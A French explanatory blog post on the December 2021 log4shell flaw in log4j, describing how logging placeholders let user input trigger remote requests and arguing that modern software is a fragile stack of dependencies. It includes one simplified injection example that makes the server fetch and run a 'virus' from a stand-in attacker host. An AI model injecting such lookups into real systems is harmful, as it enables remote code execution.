---
title: Pourquoi la faille log4shell panique tout internet ?
subtitle: Comment quelques lignes de code rendent piratable d'un coup Apple, Google, Amazon et des millions de serveurs.
date: 2021-12-18
layout: post
background: /img/2021/12/piratage.jpeg
categories: [article, podcast]
published: www.contrepoints.org
tags: [informatique, sécurité]
---


<iframe frameborder="0" loading="lazy" id="ausha-WLb9" height="220" style="border: none; width:100%; height:220px" src="https://player.ausha.co/index.html?showId=Bndd5fqXpjnw&color=%23d7d7d7&dark=true&podcastId=bY8zgtLv0Ngx&v=3&playerId=ausha-WLb9"></iframe><script src="https://player.ausha.co/ausha-player.js"></script>



Ce 10 décembre, une faille de sécurité appelée log4shell et touchant la brique logiciel log4j fut découverte. Dès lors, des millions de serveurs, y compris ceux d'Apple, Google, Amazon ou Tesla devenaient piratables.

Cette faille montre comment sans même commettre d'erreur en programmation, une faille critique peut apparaître. Elle montre aussi l'énorme château de cartes que représente chaque application informatique.

<h2> Une faille ne reposant sur aucune erreur</h2>

Log4j est une brique logiciel qui est utilisée par des millions de sites web pour logger des évènements.

Un programme informatique est par nature muet. C'est une boîte noire dont on ne voit que les données d'entrées et les résultats de sorties. Les étapes intermédiaires restent silencieuses.

Aussi, pour aider les développeurs à surveiller leurs applications, on ajoute des *logs* dans le programme. Le programme va se mettre *à parler* à chaque action accomplie.

Toutes ces déclarations sont regroupées et horodatées pour former le journal de logs, véritable historique de la plateforme en ligne.

Ainsi, si un utilisateur Bob change son email par X, on verra apparaître sur le journal de logs du site : `utilisateur Bob a changé son email par X`.

Pour rendre les logs plus puissants, log4j utilise une syntaxe afin de rajouter des balises qui seront remplies par lui. Par exemple le log `${date} utilisateur Bob a changé son mail par X` sera lu et remplacer par `18/12/2021 10:45 utilisateur Bob a changé son mail par X`.

Cette syntaxe permet d'injecter automatiquement la date, la version du logiciel, mais aussi de faire des requêtes sur un serveur distant et d'exécuter le code retourner par le serveur.

Tout ceci n'est pas codé par accident, ce sont des fonctionnalités légitimes. Mais un détail vient tout chambouler. Dans l'exemple ci-dessus, le `X` provient de l'utilisateur. Il peut donc mettre ce qu'il veut y compris une balise !

Il peut donc envoyer comme nouvelle adresse mail `${https://serveur-pirate.fr/virus}`. Le logger va analyser le log `utilisateur Bob a changé son email par ${https://serveur-pirate.fr/virus}`, requêter le serveur pirate et exécuter le virus sur la plateforme.

Cette faille ne provient pas d'un bug ou d’erreur. Elle détourne des fonctionnalités légitimes, qui misent bout à bout forment un vecteur d'attaque.

Ainsi, elle rend tous les serveurs utilisant log4j vulnérables. N'importe quel utilisateur a juste à envoyer une balise malicieuse dans la plateforme pour y prendre le contrôle.

<h2>Le château de cartes informatique</h2>

Un programme informatique repose une des centaines de briques logiciel pour fonctionner. Si une seule de ces briques fait défaut, elle contamine l'ensemble du programme.

Heureusement, le plus souvent, le problème reste bénin et ne remet pas en cause la sécurité de la plateforme.

Mais log4j, lui, anéantit la sécurité de la plateforme hôte qui l'utilise. Or il est massivement utilisé, c'est une brique logiciel incontournable dans le développement.

C'est ainsi qu’en un week-end, on se retrouve avec des millions de sites piratables tels Apple, Google, Amazon et autres.

La sécurité en informatique ne tient qu'à un fil. Des millions de sites *sains* se retrouvent piratables car une fonctionnalité, d'une brique logiciel a pu être détournée pour le piratage.

Vu la très grande utilisation de log4j, il faudra des années pour mettre à jour tous les sites. Les attaques informatiques utilisant cette faille ont eu déjà commencé.
